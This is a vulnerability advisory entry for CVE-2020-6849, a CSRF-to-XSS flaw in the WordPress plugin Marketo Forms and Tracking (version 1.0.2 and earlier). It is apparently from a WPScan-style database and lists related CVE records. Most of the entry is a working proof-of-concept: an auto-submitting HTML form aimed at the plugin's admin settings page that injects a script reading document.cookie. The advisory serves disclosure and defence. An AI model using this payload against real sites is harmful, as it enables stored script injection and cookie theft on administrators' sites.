Lucene search
WpvulndbWPEX-ID:4D885F55-6FE3-4353-9DF4-C7BA232981D0HistoryJan 17, 2020 - 12:00 a.m.
Marketo Forms and Tracking <= 1.0.2 - CSRF to XSS
2020-01-1700:00:00
wpvulndb
15
0.003 Low
EPSS
Percentile
70.0%
Lack of CSRF checks and sanitisation on the plugin’s settings page could allow XSS attacks via CSRF.
<html>
<form action="https://[WP]/wp-admin/admin.php?page=marketo_fat" method="POST" id="csrf">
<input type="text" name="marketo_save" value="true">
<input type="text" name="marketo[marketo_id]" value=""><script>alert(document.cookie)</script>">
<input type="text" name="marketo[marketo_base_url]" value="">
<input type="text" name="marketo[user_id]" value="">
<input type="text" name="marketo[end_point]" value="">
<input type="text" name="marketo[secret]" value="">
<input type="text" name="marketo[popout_title]" value="">
<input type="text" name="marketo[popout_tabtext]" value="">
<input type="text" name="marketo[popout_snippet]" value="">
<input type="text" name="marketo[popout_form]" value="">
</form>
<script>
document.getElementById('csrf').submit();
</script>
</html>Related
cve
cve
CVE-2020-6849
2020-01-21 19:15:14
prion
prion
Cross site request forgery (csrf)
2020-01-21 19:15:00
osv
osv
CVE-2020-6849
2020-01-21 19:15:14
cvelist
cvelist
CVE-2020-6849
2020-01-21 18:30:22
nvd
nvd
CVE-2020-6849
2020-01-21 19:15:14
wpvulndb
wpvulndb
Marketo Forms and Tracking <= 1.0.2 - CSRF to XSS
2020-01-17 00:00:00